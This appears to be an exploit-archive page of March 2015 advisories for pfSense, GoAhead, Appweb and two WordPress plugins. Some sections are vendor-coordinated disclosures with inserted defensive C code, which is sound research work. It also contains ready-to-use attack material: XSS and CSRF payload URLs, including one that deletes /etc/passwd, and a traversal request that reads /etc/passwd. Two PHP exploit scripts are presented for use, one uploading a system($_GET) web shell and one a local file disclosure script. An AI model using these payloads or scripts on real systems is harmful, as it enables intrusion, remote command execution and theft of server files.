
31 Mar 2015

pfSense Arbitrary file deletion and multiple XSS

Advisory ID: HTB23251
Product: pfSense
Vendor: Electric Sheep Fencing LLC 
Vulnerable Version(s): 2.2 and probably prior
Tested Version: 2.2
Advisory Publication:  March 4, 2015  [without technical details]
Vendor Notification: March 4, 2015 
Vendor Patch: March 5, 2015 
Public Disclosure: March 25, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-2294, CVE-2015-2295
Risk Level: Medium 
CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 (AV:N/AC:H/Au:N/C:N/I:N/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in the web interface of pfSense, which can be 
exploited to perform Cross-Site Scripting (XSS) attacks against the pfSense administrator and to delete arbitrary files via 
Cross-Site Request Forgery (CSRF) attacks.
 
Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root 
privileges, steal the administrator's cookies and gain complete control over the web application and even the entire 
system, as pfSense runs with root privileges and allows OS command execution via its web interface.
 
 
1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294
 
1.1 Input passed via the "zone" HTTP GET parameter to the "/status_captiveportal.php" script is not properly sanitised 
before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted 
link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
 
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
 
https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
1.2 Input passed via the "if" and "dragtable" HTTP GET parameters to the "/firewall_rules.php" script is not properly 
sanitised before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially 
crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
 
Below are two PoCs, one per vulnerable parameter, that use the JS "alert()" function to display an "ImmuniWeb" popup:
 
https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
1.3 Input passed via the "queue" HTTP GET parameter to the "/firewall_shaper.php" script is not properly sanitised before 
being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted link and 
execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
 
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
 
https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
1.4 Input passed via the "id" HTTP GET parameter to the "/services_unbound_acls.php" script is not properly sanitised 
before being returned to the user. A remote attacker can trick a logged-in administrator into opening a specially crafted 
link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
 
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
 
https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
1.5 Input passed via the "filterlogentries_time", "filterlogentries_sourceipaddress", "filterlogentries_sourceport", 
"filterlogentries_destinationipaddress", "filterlogentries_interfaces", "filterlogentries_destinationport", 
"filterlogentries_protocolflags" and "filterlogentries_qty" HTTP GET parameters to the "/diag_logs_filter.php" script is 
not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator into opening 
a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
 
Below are eight PoCs, one per vulnerable parameter, that use the JS "alert()" function to display an "ImmuniWeb" popup:
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_interfaces=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
 
2) Cross-Site Request Forgery (CSRF) in pfSense: CVE-2015-2295
 
2.1 The vulnerability exists due to insufficient validation of the HTTP request origin in the 
"/system_firmware_restorefullbackup.php" script. A remote attacker can trick a logged-in administrator into visiting a 
malicious page with a CSRF exploit and delete arbitrary files on the target system with root privileges.
 
The following PoC code deletes the file "/etc/passwd":
 
https://[host]/system_firmware_restorefullbackup.php?deletefile=../etc/passwd
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to pfSense 2.2.1
 
More Information:
https://blog.pfsense.org/?p=1661
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23251 - https://www.htbridge.com/advisory/HTB23251 - Arbitrary file deletion and 
multiple XSS vulnerabilities in pfSense.
[2] pfSense - https://www.pfsense.org - The pfSense® project is a free, open source customized distribution of FreeBSD 
specifically tailored for use as a firewall and router that is entirely managed via web interface.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and 
cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.


31 Mar 2015

GoAhead Web Server heap overflow and directory traversal

Affected software: GoAhead Web Server
Affected versions: 3.0.0 - 3.4.1 (3.x.x series before 3.4.2)
CVE ID: CVE-2014-9707

Description: The server incorrectly normalizes HTTP request URIs that
contain path segments that start with a "." but are not entirely equal
to "." or ".." (eg. ".x"). By sending a request with a URI that
contains these incorrectly handled segments, it is possible for remote
attackers to cause a heap overflow with attacker-controlled content or
perform a directory traversal attack.

Fixed version: 3.4.2
Bug entry: https://github.com/embedthis/goahead/issues/106
Fix: https://github.com/embedthis/goahead/commit/eed4a7d177bf94a54c7b06ccce88507fbd76fb77
Reported by: Matthew Daley

Detail:

The vulnerability lies in the websNormalizeUriPath function. This
function correctly handles the normalization of URIs consisting of
normal segments as well as "." and ".." segments, but fails to handle
other segments that start with a '.' character.

A quick runthrough of the important parts of this function:

The function starts by splitting up the URI into segments (at forward
slashes) into an array. At the same time, it calculates the total
length of these segments.

The function then iterates through the resulting array in order to
perform an in-place normalization (both the input and output pointers
point to the same array):

* If a given segment does not start with a '.', it is simply copied from the
current input pointer to the current output pointer. The for loop's
increment code will then advance both the input and output pointers.

* Otherwise, if the segment is "." or "..", the input and output pointers are
adjusted appropriately (taking into account the for loop's increment code)
but (correctly) no segment is copied.

* Otherwise the segment starts with a '.' but is not "." nor ".."; in this
case the function incorrectly does nothing and both the input and output
pointers are simply advanced by the for loop's increment code. This
effectively skips over a segment in the segment array without any
modification by the function.

After this iteration has completed, a string buffer for the final
output is allocated. The size used for this allocation comes from the
previously-calculated total segment length, with the addition of space
for forward slashes to join the segments back together again and a
null terminator. The segments in the array up to the final output
pointer are joined together in this buffer with forward slashes
separating them.

There are two ways to exploit this incorrect handling of certain segments:

1) Heap overflow

The heap overflow exploitation lies in the possibility to create a
disconnect between the lengths of the segments left in the segment
array after the iteration has completed and the previously-calculated
total segment length. The previously-calculated length should, in
theory, be the worst-case (longest) final output string buffer size
required (when all segments are left and none are removed by the
normalization iteration). However, since we can force the iteration to
skip over certain segments in the array, it is possible to effectively
duplicate segments in the resulting array; this is done by having the
segment copied from one location to another but then also having the
original copy skipped over, making it appear in the resulting array
twice. When this is done, the previously-calculated length is no
longer long enough for the final output's string buffer, and a heap
overflow occurs while joining together the final result.

As an example, take the following URI as input to the function:
"/./AAAAAAAA/.x".

The URI is first split into the segments "", ".", "AAAAAAAA" and ".x",
with the total segment length calculated as 0 + 1 + 8 + 2 = 11 bytes.

The normalization iteration proceeds as follows:

* The "" segment is simply copied from input to output, and hence remains
unchanged. Both the input and output pointers are then advanced.

* The "." segment causes the output pointer to stay in place while the input
pointer advances forward.

* The "AAAAAAAA" segment is simply copied from input to output, and hence
overwrites the previous "." segment. Both the input and output pointers are
then advanced.

* Finally, the ".x" segment is incorrectly handled: no modification of
segments is performed but both the input and output pointers are still
advanced, moving the output pointer over the original "AAAAAAAA" segment.

Hence, the resulting segments in the array that are left up to the
final output pointer are "", "AAAAAAAA" and "AAAAAAAA". Note that the
"AAAAAAAA" segment has been duplicated. These segments, including
space for forward slashes to join them together with and a null
terminator, have a total length of 0 + 8 + 8 + 2 + 1 = 19 bytes.

A string buffer is then allocated for the final output, which uses the
previously-calculated total segment length of 11 bytes plus 3 bytes
for forward slashes and 1 byte for a null terminator, giving a total
size of 11 + 3 + 1 = 15 bytes.

The resulting segments are finally joined together into this final
output string buffer. In doing so in this case, however, the buffer is
overflowed by 19 - 15 = 4 bytes.

So, a remote attacker can make (e.g.) a simple HTTP GET request for the
URI in question and cause a heap overflow. ASAN gives the following
output in this case, which shows the exact moment the heap overflow
occurs:

=================================================================
==2613==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x60200000d47f at pc 0x7ffff6f34020 bp 0x7fffffffd410 sp
0x7fffffffcbd0
WRITE of size 9 at 0x60200000d47f thread T0
#0 0x7ffff6f3401f in __interceptor_strcpy
(/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2f01f)
#1 0x7ffff63a7d6d in websNormalizeUriPath src/http.c:3320
#2 0x7ffff639b4de in parseFirstLine src/http.c:969
#3 0x7ffff639a905 in parseIncoming src/http.c:880
#4 0x7ffff639a4c9 in websPump src/http.c:829
#5 0x7ffff639a19c in readEvent src/http.c:802
#6 0x7ffff6399de7 in socketEvent src/http.c:740
#7 0x7ffff6399cbc in websAccept src/http.c:719
#8 0x7ffff63ac8ed in socketAccept src/socket.c:327
#9 0x7ffff63ade95 in socketDoEvent src/socket.c:638
#10 0x7ffff63add5f in socketProcess src/socket.c:622
#11 0x7ffff639daf8 in websServiceEvents src/http.c:1307
#12 0x401b5c in main src/goahead.c:153
#13 0x7ffff597ab44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#14 0x4011d8
(/home/matthew/goahead-3.4.1/build/linux-x64-debug/bin/goahead+0x4011d8)

0x60200000d47f is located 0 bytes to the right of 15-byte region
[0x60200000d470,0x60200000d47f)
allocated by thread T0 here:
#0 0x7ffff6f5973f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x7ffff63a7d04 in websNormalizeUriPath src/http.c:3318
#2 0x7ffff639b4de in parseFirstLine src/http.c:969
#3 0x7ffff639a905 in parseIncoming src/http.c:880
#4 0x7ffff639a4c9 in websPump src/http.c:829
#5 0x7ffff639a19c in readEvent src/http.c:802
#6 0x7ffff6399de7 in socketEvent src/http.c:740
#7 0x7ffff6399cbc in websAccept src/http.c:719
#8 0x7ffff63ac8ed in socketAccept src/socket.c:327
#9 0x7ffff63ade95 in socketDoEvent src/socket.c:638
#10 0x7ffff63add5f in socketProcess src/socket.c:622
#11 0x7ffff639daf8 in websServiceEvents src/http.c:1307
#12 0x401b5c in main src/goahead.c:153
#13 0x7ffff597ab44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
(... snip ...)

As with all heap overflows, it's likely that this can then go on to be
exploited in order to gain full remote code execution, especially in
embedded systems which are less likely to have heap allocators with
modern hardening techniques.

2) Directory traversal

The directory traversal exploitation lies in the fact that we can
force the normalization iteration to skip over certain segments in the
array; namely, we can force it to skip over a ".." segment. The ".."
segment will pass through unchanged into the final output string
buffer, where it is treated by the rest of the server as an actual
parent-directory relative segment.

As an example, take the following URI as input to the function:
"/../../../../../.x/.x/.x/.x/.x/.x/etc/passwd".

The URI is first split into the segments "", "..", "..", "..", "..",
"..", ".x", ".x", ".x", ".x", ".x", ".x", "etc", and "passwd". (The
total segment length that is calculated during this operation is
irrelevant for this mode of exploitation.)

When the normalization iteration reaches the ".x" segments, the
contents of the segment array are still untouched (as all the previous
segments are either empty or are "..") and the output pointer is still
pointing back at the "" segment. The incorrect handling of the ".x"
segments only causes the output (and input) pointers to be advanced
forward over the "" and ".." segments.

When the iteration reaches the "etc" segment, all the "" and ".."
segments have been skipped over; the output pointer is now pointing at
the first ".x" segment. The "etc" is copied over the first ".x"
segment, and the "passwd" segment is copied over the second ".x"
segment.

Hence, the resulting segments in the array that are left up to the
final output pointer are "", "..", "..", "..", "..", "..", "etc" and
"passwd"; note that the ".." segments are still present.

The final output string buffer is created and the resulting segments
are joined together to give a string of "/../../../../../etc/passwd".

The rest of the server is expecting that the result from the function
is normalized and that it contains no relative segments. Hence, the
".." segments go unnoticed when opening the content file while
handling the HTTP request. The end result is that the local filesystem
is traversed up from the administrator-configured web root until
reaching the filesystem's root directory and back down again into the
"/etc/passwd" file. Hence, the file "/etc/passwd" is given in response
to the HTTP request, regardless of the configured web root.

So, a remote attacker can make (e.g.) a simple HTTP GET request for the
URI in question and get the contents of the "/etc/passwd" file:

$ echo -ne 'GET /../../../../../.x/.x/.x/.x/.x/.x/etc/passwd HTTP/1.0\r\n\r\n' | nc localhost 4700
HTTP/1.0 200 OK
Server: GoAhead-http
Date: Sun Nov 16 17:21:01 2014
Content-Length: 1346
Connection: close
Last-Modified: Sat Oct 25 17:07:25 2014

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
(... snip ...)

Of course, 5 ".." segments may not be enough to reach the filesystem's
root directory in all cases and so the crafted URI may have to be
extended with more ".." and ".x" segments.

- Matthew Daley
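As an added example (not part of the advisory and not GoAhead's source), the following C program is a simplified model of the segment-array logic walked through above: it splits the URI, runs the in-place normalisation with separate input and output indices, and computes the output buffer size the way the advisory describes, but joins into a correctly sized buffer and reports how many bytes the original allocation would have been short instead of overflowing. The `fixed` flag copies ".x"-style segments like ordinary names. All names are this example's own; the ".." handling (pop the previous output segment, never below slot 0) is chosen so the model reproduces the advisory's two traces and is an assumption about the original. `has_parent_segment()` is the post-condition check the rest of a server should apply before opening a file.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SEG 64   /* model limit; the real code sizes the array from strlen() */

/* Normalise uri. fixed == 0 reproduces the bug: a segment starting with '.'
 * that is neither "." nor ".." is neither copied nor dropped, so the output
 * slot is skipped and whatever pointer already sat there survives.
 * fixed != 0 copies such a segment like any other name.
 * Returns a malloc'ed string built in a correctly sized buffer. *shortfall is
 * (bytes the joined string needs) - (bytes the original formula allocates);
 * a positive value is the size of the heap overflow the real code performs. */
char *normalize_uri(const char *uri, int fixed, int *shortfall)
{
    size_t ulen = strlen(uri);
    char *dup = malloc(ulen + 1);
    memcpy(dup, uri, ulen + 1);

    /* 1. Split at '/' and sum segment lengths; an absolute path yields a
     *    leading "" segment, as in the advisory's traces. */
    char *seg[MAX_SEG];
    int nseg = 0, total_len = 0;
    char *mark = dup;
    for (char *p = dup;; p++) {
        if (*p != '/' && *p != '\0') continue;
        int last = (*p == '\0');
        *p = '\0';
        if (nseg == MAX_SEG) break;
        seg[nseg++] = mark;
        total_len += (int)strlen(mark);
        if (last) break;
        mark = p + 1;
    }

    /* 2. In-place normalisation: `in` walks the array, `out` is the next output slot. */
    int out = 0;
    for (int in = 0; in < nseg; in++) {
        char *s = seg[in];
        if (s[0] != '.') {
            seg[out++] = s;              /* ordinary segment: copy */
        } else if (s[1] == '\0') {
            /* ".": dropped, out stays put */
        } else if (s[1] == '.' && s[2] == '\0') {
            if (out > 0) out--;          /* "..": pop previous output segment (assumed semantics) */
        } else if (fixed) {
            seg[out++] = s;              /* ".x": just a name */
        } else {
            out++;                       /* BUG: slot skipped, stale pointer left in seg[out] */
        }
    }

    /* 3. Join. The original allocates total_len (pre-normalisation) + one slash
     *    per surviving segment + NUL; a duplicated segment needs more than that. */
    int alloc = total_len + out + 1;
    int joined = 0;
    for (int i = 0; i < out; i++) joined += (int)strlen(seg[i]) + (i > 0);
    int prefix = (uri[0] == '/') && (joined == 0 || seg[0][0] != '\0'); /* keep absolute paths rooted */
    int need = prefix + joined + 1;
    *shortfall = need - alloc;

    char *res = malloc((size_t)need), *d = res;
    if (prefix) *d++ = '/';
    for (int i = 0; i < out; i++) {
        if (i > 0) *d++ = '/';
        size_t n = strlen(seg[i]);
        memcpy(d, seg[i], n);
        d += n;
    }
    *d = '\0';
    free(dup);
    return res;
}

/* Post-condition the rest of a server relies on: no ".." segment survives. */
int has_parent_segment(const char *path)
{
    for (const char *p = path; *p; ) {
        if (p[0] == '.' && p[1] == '.' && (p[2] == '/' || p[2] == '\0')) return 1;
        if (!(p = strchr(p, '/'))) break;
        p++;
    }
    return 0;
}

/* Check helpers: normalised string comparison and overflow size. */
int normalizes_to(const char *uri, int fixed, const char *expected)
{
    int sf;
    char *r = normalize_uri(uri, fixed, &sf);
    int ok = strcmp(r, expected) == 0;
    free(r);
    return ok;
}

int overflow_bytes(const char *uri, int fixed)
{
    int sf;
    char *r = normalize_uri(uri, fixed, &sf);
    free(r);
    return sf;
}

int main(void)
{
    const char *uris[] = { "/./AAAAAAAA/.x", "/../../../../../.x/.x/.x/.x/.x/.x/etc/passwd" };
    for (int fixed = 0; fixed < 2; fixed++)
        for (int i = 0; i < 2; i++) {
            int sf;
            char *r = normalize_uri(uris[i], fixed, &sf);
            printf("%s %-44s -> %-30s shortfall=%+d dotdot=%d\n",
                   fixed ? "fixed" : "buggy", uris[i], r, sf, has_parent_segment(r));
            free(r);
        }
    return 0;
}
```

In buggy mode "/./AAAAAAAA/.x" normalises to "/AAAAAAAA/AAAAAAAA" with a shortfall of 4 bytes, the 19 - 15 computed above, and the traversal URI normalises to "/../../../../../etc/passwd" with the ".." segments intact; with ".x" segments copied the same inputs give "/AAAAAAAA/.x" and "/.x/.x/.x/.x/.x/.x/etc/passwd", and `has_parent_segment()` flags only the buggy traversal result.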


31 Mar 2015

Appweb Web Server remotely-triggerable DoS

Affected software: Appweb Web Server
CVE ID: CVE-2014-9708
 
Description: An HTTP request with a Range header of the form "Range:
x=," (i.e. with an empty range value) will cause a null pointer
dereference, leading to a remotely-triggerable DoS.
 
Fixed versions: 4.6.6, 5.2.1
Bug entry: https://github.com/embedthis/appweb/issues/413
Fix: 
https://github.com/embedthis/appweb/commit/7e6a925f5e86a19a7934a94bbd6959101d0b84eb#diff-7ca4d62c70220e0e226e7beac90c95d9L17348
Reported by: Matthew Daley
 
- Matthew Daley
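Added example, not Appweb's code: a Range header parser in C that handles the degenerate forms the advisory names, an unknown unit such as "x=" and an empty range spec such as "bytes=," or "bytes=", by rejecting the header so the caller never receives a range it could dereference. The function names, the conservative policy (any empty or malformed spec invalidates the whole header, so the server ignores Range and serves the full body) and the sample inputs are this example's own assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct byte_range { long start, end; };   /* inclusive offsets resolved against the body size */

static void skip_ws(const char **p) { while (**p == ' ' || **p == '\t') (*p)++; }

static int parse_num(const char **p, long *out)
{
    if (!isdigit((unsigned char)**p)) return 0;
    char *end;
    *out = strtol(*p, &end, 10);
    *p = end;
    return 1;
}

/* Parse a Range header value for a body of `size` bytes into `out` (at most
 * `max` entries). Returns the number of satisfiable ranges, or 0 when the
 * header must be ignored: unknown unit, empty or malformed spec, or an
 * unsatisfiable range. "x=," and "bytes=" both return 0 rather than yielding
 * an entry the caller could dereference. */
int parse_range_header(const char *value, long size, struct byte_range *out, int max)
{
    const char *p = value;
    int n = 0;
    if (size <= 0) return 0;
    skip_ws(&p);
    if (strncmp(p, "bytes=", 6) != 0) return 0;   /* "x=" is not a unit we serve */
    p += 6;
    for (;;) {
        skip_ws(&p);
        if (*p == '\0' || *p == ',') return 0;    /* empty spec: "bytes=", "bytes=,", "bytes=0-9," */
        long first, last, s, e;
        int have_first = parse_num(&p, &first);
        if (*p != '-') return 0;
        p++;
        int have_last = parse_num(&p, &last);
        if (!have_first && !have_last) return 0;  /* a bare "-" */
        if (!have_first) {                        /* suffix form "-N": the last N bytes */
            if (last == 0) return 0;
            s = last >= size ? 0 : size - last;
            e = size - 1;
        } else {
            s = first;
            e = have_last ? last : size - 1;
            if (e > size - 1) e = size - 1;       /* clamp an open or oversized end */
            if (s > e) return 0;                  /* starts past the end, or inverted */
        }
        if (n == max) return 0;
        out[n].start = s;
        out[n].end = e;
        n++;
        skip_ws(&p);
        if (*p == '\0') return n;
        if (*p != ',') return 0;
        p++;
    }
}

/* Check helpers: bounds of the idx-th range, or -1 when the header is rejected. */
long range_start(const char *value, long size, int idx)
{
    struct byte_range r[8];
    int n = parse_range_header(value, size, r, 8);
    return idx < n ? r[idx].start : -1;
}

long range_end(const char *value, long size, int idx)
{
    struct byte_range r[8];
    int n = parse_range_header(value, size, r, 8);
    return idx < n ? r[idx].end : -1;
}

int main(void)
{
    /* constructed sample header values, including the advisory's "x=," */
    const char *samples[] = { "bytes=0-99,200-", "bytes=-100", "x=,", "bytes=", "bytes=0-9,", "bytes=5-2" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct byte_range r[8];
        int n = parse_range_header(samples[i], 1000, r, 8);
        printf("%-18s -> %d range(s)", samples[i], n);
        for (int j = 0; j < n; j++) printf(" [%ld-%ld]", r[j].start, r[j].end);
        printf("%s\n", n ? "" : " (ignore header, serve 200 with the full body)");
    }
    return 0;
}
```

The parser returns a count rather than a pointer, so the "no ranges" case is an ordinary branch for the caller instead of a NULL it might forget to check.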


30 Mar 2015

WordPress InBoundio Marketing Shell Upload

<?php
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload / Code Exec
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://www.inboundio.com
#
###########################################
#
# [!] Description :
#
# The WordPress plugin InBoundio Marketing v1.0 suffers from a file/shell upload vulnerability:
# a remote attacker can upload a file/shell/backdoor and execute commands.
#
####
# Lines (6... to 20) : csv_uploader.php
####
#
# ExpLO!T : 
# -------
 
$postData = array();
// Shell to upload: CURLFile on PHP >= 5.5, the legacy "@file" syntax before that.
$postData[ 'file' ] = class_exists('CURLFile') ? new CURLFile('k3dz.php') : "@k3dz.php"; #Shell_2_Exec ;)
 
$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_POST, 1);
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
curl_setopt($dz, CURLOPT_RETURNTRANSFER, 1); // return the response so $buf holds the body, not "1"
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;
 
/*
[!] Create your shell file =>
 _ k3dz.php :
 
 <?php system($_GET['dz']); ?>
 
[>] Post the exploit 
[+] Find your backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]
[+] Or upload whatever you want ^_^ ...
 
*/
 
####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
 
# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-inboundio-marketing.html
 
?>


30 Mar 2015

WordPress MP3-Jplayer 2.1 Local File Disclosure

<?php
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : WordPress plugin (mp3-jplayer v2.3) Local File Disclosure
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://mp3-jplayer.com
#
###########################################
#
# [!] Description :
#
# The WordPress plugin mp3-jplayer v2.3 suffers from local file disclosure:
# a remote attacker can download/disclose files from the root path.
#
# ExpLO!T : 
# -------
#
$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/mp3-jplayer/download.php?mp3=[ LFI ]%00.mp3"); # or ../remote/downloader.php?mp3=[ LFI ]%00.ogg
curl_setopt($dz, CURLOPT_HTTPGET, 1);
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_RETURNTRANSFER, 1); // return the response so $buf holds the file contents, not "1"
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;
 
####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
 
# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-mp3-jplayer-v23-local.html
 
?>


30 Mar 2015

WordPress AB Google Map Travel CSRF / XSS

===============================================================================
